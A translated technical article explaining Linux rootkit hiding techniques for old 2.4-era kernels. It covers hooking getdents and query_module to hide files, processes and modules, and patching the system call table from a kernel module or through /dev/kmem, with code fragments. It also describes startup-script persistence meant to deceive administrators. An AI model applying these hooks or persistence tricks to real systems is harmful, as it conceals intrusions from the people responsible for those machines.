Advanced Hiding Techniques in the Linux Environment

Last Update:2017-01-18 Source: Internet

Author: User

Abstract: This article analyzes in depth the advanced techniques for hiding files, processes, and modules in the Linux environment, including loadable kernel module (LKM) programming, modifying system calls by directly patching the memory image, and hiding specific processes through the proc virtual file system.

Hiding techniques are widely used in computer system security, especially in network attacks: once an attacker has successfully broken into a system, effectively hiding the attacker's files, processes, and loaded modules becomes particularly important. This article discusses advanced techniques for hiding files, processes, and modules on Linux systems. Some of them are already widely used in backdoors and security testing tools, while others are new, still under discussion, and rarely applied.

1. Hiding Technology Background

1.1 Interrupt control and system calls in Linux

Intel x86 processors support 256 interrupts. So that the processor can easily identify each interrupt source, the interrupts are numbered from 0 to 255; that is, each is given an interrupt type code n, which Intel calls the interrupt vector.

Linux uses one interrupt vector (128, or 0x80) to implement system calls, and every system call enters the kernel through the single entry point system_call. When a user-mode process executes the assembly instruction int 0x80, the CPU switches to kernel mode and starts executing the system_call function, which then jumps to the address of the requested system call through the system call table sys_call_table. The table stores the addresses of all system call functions, and each address is indexed by its system call number; for example, sys_call_table[__NR_fork] holds the address of the system call sys_fork().
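The table lookup described above can be pictured with a small user-space model. This is only a sketch: the toy_ names, the three-entry table, and the handler return values are hypothetical and are not taken from the kernel; only the idea of a range check followed by an indexed call comes from the text.

```c
#include <stddef.h>

/* Hypothetical call numbers, for illustration only. */
enum { TOY_NR_EXIT = 1, TOY_NR_FORK = 2, TOY_NR_SYSCALLS = 3 };

typedef long (*toy_syscall_fn)(long arg);

/* Hypothetical handlers standing in for real system call functions. */
static long toy_sys_exit(long arg) { return arg; }
static long toy_sys_fork(long arg) { (void)arg; return 42; }

/* Slot 0 is left empty as a stand-in for an unimplemented call. */
static toy_syscall_fn toy_call_table[TOY_NR_SYSCALLS] = {
    NULL, toy_sys_exit, toy_sys_fork
};

/* Mimics the range check and the indexed call made by system_call. */
long toy_dispatch(unsigned long nr, long arg)
{
    if (nr >= TOY_NR_SYSCALLS || toy_call_table[nr] == NULL)
        return -38; /* -ENOSYS on Linux */
    return toy_call_table[nr](arg);
}
```

Because every call goes through one table, changing a single table entry changes what every caller of that number reaches, which is why the table is the focus of the rest of this article.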

Linux uses an interrupt descriptor (8 bytes) to represent information about each interrupt, in the following format:

Bits 63..48: offset 31..16 | Bits 47..32: flags, type code, and reserved bits
Bits 31..16: segment selector | Bits 15..0: offset 15..0

All interrupt descriptors are stored in one contiguous region of memory called the interrupt descriptor table (IDT). Its starting address is held in the interrupt descriptor table register (IDTR), which has the following format:

32-bit base address | 16-bit limit

These structures are linked as follows: the IDTR register gives the base address of the interrupt descriptor table, and entry 0x80 of that table holds the address of the system_call function. The address of system_call can therefore be found by reading IDTR, locating the interrupt descriptor table, and reading its entry 0x80. This address is used in the discussion later.
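The descriptor layout above can be expressed as a packed C structure, and the handler address recovered by joining the two offset halves. This is a minimal sketch that works on a descriptor already held in memory; the names gate_desc, idt_entry_addr, and gate_offset are hypothetical, and the packed attribute assumes GCC or Clang.

```c
#include <stdint.h>

/* 8-byte i386 gate descriptor, lowest-addressed field first. */
struct gate_desc {
    uint16_t off_lo;   /* offset bits 15..0 */
    uint16_t sel;      /* segment selector */
    uint8_t  reserved; /* reserved bits */
    uint8_t  flags;    /* type code and flags */
    uint16_t off_hi;   /* offset bits 31..16 */
} __attribute__((packed));

/* Address of entry n, given the IDT base; each entry is 8 bytes. */
uint32_t idt_entry_addr(uint32_t idt_base, unsigned n)
{
    return idt_base + 8u * n;
}

/* Joins the two 16-bit halves into the 32-bit handler address. */
uint32_t gate_offset(const struct gate_desc *g)
{
    return ((uint32_t)g->off_hi << 16) | g->off_lo;
}
```

For entry 0x80 the byte offset into the table is 8 * 0x80 = 0x400.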

1.2 Linux LKM (loadable kernel module) technology

The Linux kernel provides a module mechanism so that the kernel can stay small while remaining easy to extend. Modules are part of the kernel but are not compiled into it; they are compiled into object files and dynamically inserted into or removed from the running kernel as needed. Because a module runs as part of the Linux kernel once inserted, module programming is essentially kernel programming, and a module can use resources exported by the kernel, such as the address of the system call table (sys_call_table), which was exported by kernels before version 2.4.18. With this address, a system call can be changed by directly modifying its entry in the table. Every module must have an initialization function and a cleanup function, which by default are init_module() and cleanup_module(); starting with kernel version 2.3.13 the user can also give these two functions other names. The initialization function is called when the module is inserted into the system, and this is where functions and symbols can be registered. The cleanup function is called when the module is removed from the system, and it usually undoes what the initialization function did.

1.3 Memory image in Linux

/dev/kmem is a character device that presents an image of kernel virtual memory. Through it the running system can be examined and even modified. When the kernel does not export the address of sys_call_table, or when modules cannot be inserted, system calls can be modified through this device in order to hide files, processes, or modules.

1.4 The proc file system

The proc file system is a virtual file system that uses the file system interface to expose the running state of the system. It provides a file-based interface for communication between the operating system and application processes, so that applications can safely and conveniently read internal data about the current state of the system and modify some of the system's configuration. Because proc is implemented behind the file system interface, it can be accessed like ordinary files, but it exists only in memory.
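Because proc looks like an ordinary directory tree, a user-space program can enumerate processes with the standard directory API. The following is a minimal sketch of that idea, assuming the usual convention that each process appears as a directory whose name is its decimal PID; the function names is_pid_name and count_pid_dirs are hypothetical.

```c
#include <ctype.h>
#include <dirent.h>
#include <stddef.h>

/* Returns 1 if name consists only of decimal digits, as a PID
   directory name does, and 0 otherwise. */
int is_pid_name(const char *name)
{
    if (*name == '\0')
        return 0;
    for (; *name != '\0'; name++)
        if (!isdigit((unsigned char)*name))
            return 0;
    return 1;
}

/* Counts the numeric entries under dir (normally "/proc").
   Returns -1 if the directory cannot be opened. */
int count_pid_dirs(const char *dir)
{
    DIR *d = opendir(dir);
    struct dirent *e;
    int n = 0;

    if (d == NULL)
        return -1;
    while ((e = readdir(d)) != NULL)
        if (is_pid_name(e->d_name))
            n++;
    closedir(d);
    return n;
}
```

Calling count_pid_dirs("/proc") on a Linux system gives the number of processes visible through the directory listing, which is the same view that the directory-reading system call returns to any other program.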

2. Technical Analysis

2.1 Hiding files

The system call that Linux uses to query file information is sys_getdents. This can be observed with strace: for example, strace ls lists the system calls made by the ls command, and the output shows that ls does its work through sys_getdents. When information about a file or directory is requested, Linux executes sys_getdents to perform the query and passes the result to the program running in user space. If this system call is modified so that the entries for a particular file are removed from the result, no program that uses the system call will see the file, and the file is hidden. The prototype of the original system call is:
int sys_getdents(unsigned int fd, struct dirent *dirp, unsigned int count);
Here fd is a file descriptor that refers to a directory. The call reads dirent structures from that directory into the buffer dirp, count is the size of that buffer in bytes, and on success the function returns the number of bytes written to dirp.

The modified system call, hacked_getdents, first calls the original system call and then removes the entries for the file name to be hidden from the returned dirent structures, so that the application sees no trace of the file when the system call returns.

Note that some newer versions use sys_getdents64 to query file information. Its implementation is essentially the same as that of sys_getdents, so on those versions the system call can be modified in a similar way to hide files.
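The removal step amounts to compacting a buffer of variable-length records. The sketch below models it entirely in user space on a made-up record format (a 2-byte length followed by a NUL-terminated name); it is not struct dirent and not kernel code, and the names toy_append and toy_filter are hypothetical.

```c
#include <stddef.h>
#include <string.h>

/* Appends one record (2-byte length, then the name) at offset used.
   Returns the new number of bytes in use. The caller must make
   sure buf is large enough. */
size_t toy_append(char *buf, size_t used, const char *name)
{
    unsigned short reclen =
        (unsigned short)(sizeof(unsigned short) + strlen(name) + 1);

    memcpy(buf + used, &reclen, sizeof reclen);
    memcpy(buf + used + sizeof reclen, name, strlen(name) + 1);
    return used + reclen;
}

/* Removes every record whose name equals hide by sliding the
   following records forward. Returns the new number of bytes. */
size_t toy_filter(char *buf, size_t used, const char *hide)
{
    size_t pos = 0;

    while (pos < used) {
        unsigned short reclen;

        memcpy(&reclen, buf + pos, sizeof reclen);
        if (reclen == 0)
            break; /* malformed record, stop scanning */
        if (strcmp(buf + pos + sizeof reclen, hide) == 0) {
            memmove(buf + pos, buf + pos + reclen, used - pos - reclen);
            used -= reclen;
        } else {
            pos += reclen;
        }
    }
    return used;
}
```

The shortened length plays the role of the byte count that the system call returns, which is why a caller that trusts that count never sees the removed record. Comparing a directory listing against an independent view of the disk is one way such tampering is detected.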

2.2 Hiding modules

The previous section showed how to modify a system call to hide a file with a specific name. In practice the system call is usually modified from a module, but if the inserted module is not hidden, it is easily discovered, and once it is found and unloaded, every file it was hiding is exposed. It is therefore also necessary to hide a module with a specific name. The system call that Linux uses to query module information is sys_query_module, so a module can be hidden by modifying this system call. The prototype of the original system call is:
int sys_query_module(const char *name, int which, void *buf, size_t bufsize, size_t *ret);
If name is not NULL, the call refers to that specific module; otherwise it refers to the kernel itself. The parameter which selects the type of query: when which is QM_MODULES, the names of all currently inserted modules are returned in buf and the number of modules in ret; bufsize is the size of the buffer buf. To hide a module, it is enough to handle the case which = QM_MODULES. The modified system call works as follows:

1) Call the original system call; if it fails, return the error code.
2) If which is not QM_MODULES, no processing is needed; return directly.
3) Scan the names starting at the beginning of buf; if the name to be hidden is found, overwrite it with the module names that follow it.
4) Repeat step 3 until all names have been processed, then return success.
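Steps 3 and 4 can be sketched in user space as an operation on a buffer of NUL-terminated names stored back to back. The function name names_remove is hypothetical, and decrementing the count is an assumption of this sketch; the steps above do not say how ret is adjusted.

```c
#include <stddef.h>
#include <string.h>

/* buf holds *count NUL-terminated names stored back to back.
   Removes the first name equal to hide by moving the later names
   forward. Returns 1 if a name was removed, 0 otherwise. */
int names_remove(char *buf, size_t *count, const char *hide)
{
    char *p = buf;
    size_t i, j;

    for (i = 0; i < *count; i++) {
        size_t len = strlen(p) + 1;

        if (strcmp(p, hide) == 0) {
            /* Measure the bytes occupied by the names that follow. */
            size_t tail = 0;
            const char *q = p + len;

            for (j = i + 1; j < *count; j++) {
                size_t l = strlen(q) + 1;
                tail += l;
                q += l;
            }
            memmove(p, p + len, tail);
            (*count)--; /* assumption: the reported count shrinks too */
            return 1;
        }
        p += len;
    }
    return 0;
}
```

With the names ext3, hidden, and nfs in the buffer, removing hidden leaves ext3 followed directly by nfs and a count of 2.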

2.3 Hiding processes

Linux has no system call that queries process information directly. Commands such as ps obtain process information by reading the proc file system, which was introduced in the background section. Because proc is implemented behind the file system interface, the file-hiding method can also hide entries in the proc file system; it is only necessary to add handling of the proc file system to hacked_getdents above. Since proc is a special file system that exists only in memory and not on any physical device, the Linux kernel assigns it the major device number 0 and the minor device number 1. And because it has no inodes on external storage, the system also assigns its root a special inode number, PROC_ROOT_INO (whose value is 1), and inode number 1 is reserved on real devices. From this analysis, the following steps determine whether a file belongs to the proc file system:

1) Obtain the inode structure dinode that corresponds to the file.
2) if (dinode->i_ino == PROC_ROOT_INO && !MAJOR(dinode->i_dev) && MINOR(dinode->i_dev) == 1) {the file belongs to the proc file system}
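The test in step 2 can be tried out in user space on a mock inode. Everything prefixed with toy_ or TOY_ is a hypothetical stand-in for the kernel definitions; the macros assume the 2.4-style device number with an 8-bit major part and an 8-bit minor part.

```c
/* Hypothetical user-space stand-ins for the kernel definitions. */
#define TOY_PROC_ROOT_INO 1UL
#define TOY_MAJOR(dev) ((unsigned)(dev) >> 8)     /* upper 8 bits */
#define TOY_MINOR(dev) ((unsigned)(dev) & 0xffu)  /* lower 8 bits */

/* Only the two fields used by the test are modelled. */
struct toy_inode {
    unsigned long  i_ino;
    unsigned short i_dev;
};

/* Returns 1 when the inode looks like the root of the proc file
   system: inode number 1 on device major 0, minor 1. */
int is_proc_root(const struct toy_inode *dinode)
{
    return dinode->i_ino == TOY_PROC_ROOT_INO
        && TOY_MAJOR(dinode->i_dev) == 0
        && TOY_MINOR(dinode->i_dev) == 1;
}
```

An inode with number 1 on device 0x0301 (major 3, minor 1) fails the test, so a real disk partition whose root happens to share the inode number is not mistaken for proc.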

Based on this analysis, the pseudo code for hiding a particular process is:

hacked_getdents(unsigned int fd, struct dirent *dirp, unsigned int count)
{
    call the original system call;
    obtain the inode that corresponds to fd;
    if (the file belongs to the proc file system && the file name needs to be hidden)
        {remove the information about the file from dirp}
}

2.4 Ways to modify system calls

Now that it is clear how system calls must be modified to hide things, how is the original system call replaced with the modified one? In practice this is often the most critical problem. The following discusses how to do it in different situations.

(1) When the system exports sys_call_table and supports loadable modules:

This kernel configuration was very common before Linux kernel version 2.4.18. In this case modifying a system call is easy: change the corresponding entry in sys_call_table so that it points to the new system call. The following code shows how:

extern void *sys_call_table[];
int (*orig_getdents)(unsigned int fd, struct dirent *dirp, unsigned int count);
int (*orig_query_module)(const char *name, int which, void *buf, size_t bufsize, size_t *ret);

int init_module(void)
/* module initialization */
{
    orig_getdents = sys_call_table[SYS_getdents];            /* save the original system calls */
    orig_query_module = sys_call_table[SYS_query_module];
    sys_call_table[SYS_getdents] = hacked_getdents;          /* install the new system calls */
    sys_call_table[SYS_query_module] = hacked_query_module;
    return 0;                                                /* 0 indicates success */
}

void cleanup_module(void)
/* module removal */
{
    sys_call_table[SYS_getdents] = orig_getdents;            /* restore the original system calls */
    sys_call_table[SYS_query_module] = orig_query_module;
}

(2) In cases where the system does not export sys_call_table:

For security reasons, Linux kernels after 2.4.18 no longer export the address of the system call table, so the address must be obtained another way. As mentioned in the background section, /dev/kmem is an image of kernel memory; it can be searched to find the address of sys_call_table, and the table can then be modified to use the new system calls. How is the address of sys_call_table found in the memory image? First look at how the source code of system_call implements system calls (see arch/i386/kernel/entry.S):

ENTRY(system_call)
    pushl %eax                              # save orig_eax
    SAVE_ALL
    GET_CURRENT(%ebx)
    cmpl $(NR_syscalls),%eax
    jae badsys
    testb $0x02,tsk_ptrace(%ebx)            # PT_TRACESYS
    jne tracesys
    call *SYMBOL_NAME(sys_call_table)(,%eax,4)
    movl %eax,EAX(%esp)                     # save the return value
ENTRY(ret_from_sys_call)

This code first saves the relevant registers, then checks whether the system call number (in the eax register) is valid, then handles the tracing (debugging) case, and finally uses call *SYMBOL_NAME(sys_call_table)(,%eax,4) to transfer control to the requested system call, where SYMBOL_NAME(sys_call_table) is the address of sys_call_table. It follows that once the system_call function has been located, the position of sys_call_table can be determined by searching the function's bytes for this call instruction: the machine code of call something(,%eax,4) is 0xff 0x14 0x85, followed by the 32-bit address, so matching these three bytes is enough. How to find the address of system_call was described in the background section. The pseudo code is as follows:

struct {    /* IDTR register contents; see the background section for the fields */
    unsigned short limit;
    unsigned int base;
} __attribute__((packed)) idtr;
struct {    /* interrupt descriptor; see the background section for the fields */
    unsigned short off1;
    unsigned short sel;
    unsigned char none, flags;
    unsigned short off2;
} __attribute__((packed)) idt;
int kmem;
/* Reads sz bytes into memory m, starting at offset off of the file opened as kmem. */
void readkmem(void *m, unsigned off, int sz) {...}
/* Writes count bytes from src to offset dest of the file opened as kmem. */
void writekmem(void *src, unsigned dest, unsigned int count) {...}
unsigned sct;           /* address of sys_call_table */
unsigned sys_call_off;  /* address of the system_call function */
char buff[100];         /* first 100 bytes of the system_call function */
char *p;
if ((kmem = open("/dev/kmem", O_RDONLY)) < 0)
    return 1;
asm("sidt %0" : "=m" (idtr));                         /* read the IDTR register into idtr */
readkmem(&idt, idtr.base + 8 * 0x80, sizeof(idt));    /* read descriptor 0x80 into idt */
sys_call_off = (idt.off2 << 16) | idt.off1;           /* address of the system_call function */
readkmem(buff, sys_call_off, 100);                    /* read the first 100 bytes of system_call into buff */
p = (char *)memmem(buff, 100, "\xff\x14\x85", 3);     /* locate the machine code of the call instruction */
if (p == NULL)
    return 1;                                         /* pattern not found */
sct = *(unsigned *)(p + 3);                           /* the sys_call_table address follows the three opcode bytes */
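The pattern-matching step can be checked in isolation on an ordinary byte array. The sketch below assumes a little-endian 32-bit operand directly after the three opcode bytes, as on i386; the function name find_call_operand is hypothetical, and a plain loop with memcmp is used in place of memmem, which is a GNU extension.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Scans code[0..len) for the bytes ff 14 85. If they are found with
   four more bytes after them, stores the little-endian 32-bit operand
   in *addr and returns 1. Returns 0 if the pattern is absent. */
int find_call_operand(const unsigned char *code, size_t len, uint32_t *addr)
{
    static const unsigned char pat[3] = { 0xff, 0x14, 0x85 };
    size_t i;

    for (i = 0; i + sizeof pat + 4 <= len; i++) {
        if (memcmp(code + i, pat, sizeof pat) == 0) {
            const unsigned char *p = code + i + sizeof pat;

            *addr = (uint32_t)p[0] | ((uint32_t)p[1] << 8)
                  | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
            return 1;
        }
    }
    return 0;
}
```

The same scan is useful defensively: an integrity checker can extract the table address this way and compare the table entries against the addresses recorded for a known-good kernel.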

At this point the location of sys_call_table in memory is known, so the entry for any system call can be found from its system call number, and overwriting that entry makes the kernel use the new system call function. Writing requires /dev/kmem to be opened for reading and writing (O_RDWR) rather than read-only. Specifically:

readkmem(&orig_getdents, sct + SYS_getdents * 4, 4);            /* save the original system calls */
readkmem(&orig_query_module, sct + SYS_query_module * 4, 4);
writekmem(hacked_getdents, sct + SYS_getdents * 4, 4);          /* install the new system calls */
writekmem(hacked_query_module, sct + SYS_query_module * 4, 4);

2.5 Other related techniques

The techniques above solve the hiding problem itself. In practice, the code that starts the module or process can be placed in the appropriate startup directory: assuming the system runs at run level 3, it can be added to the directory rc3.d (usually found under /etc/rc.d or /etc), with the script then renamed to a name that is itself hidden. Another way is to insert the code that starts the module or process into one of the existing startup scripts, but this is easier to discover. One solution is to restore the script to its normal contents immediately after the process or module has started. Because the system sends the SIGHUP signal to all processes at shutdown, the process or module can handle this signal and, when it arrives, modify the startup script to add the loading code again. The module is then loaded at the next boot, while an administrator who inspects the startup script sees nothing unusual.

3. Concluding remarks

This article has analyzed some advanced hiding techniques in the Linux environment. These techniques are useful not only in system security but also as a reference in other areas. Because Linux is open, an attacker who obtains root privileges can make extensive changes to the system, so preventing the initial intrusion is especially important.

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.
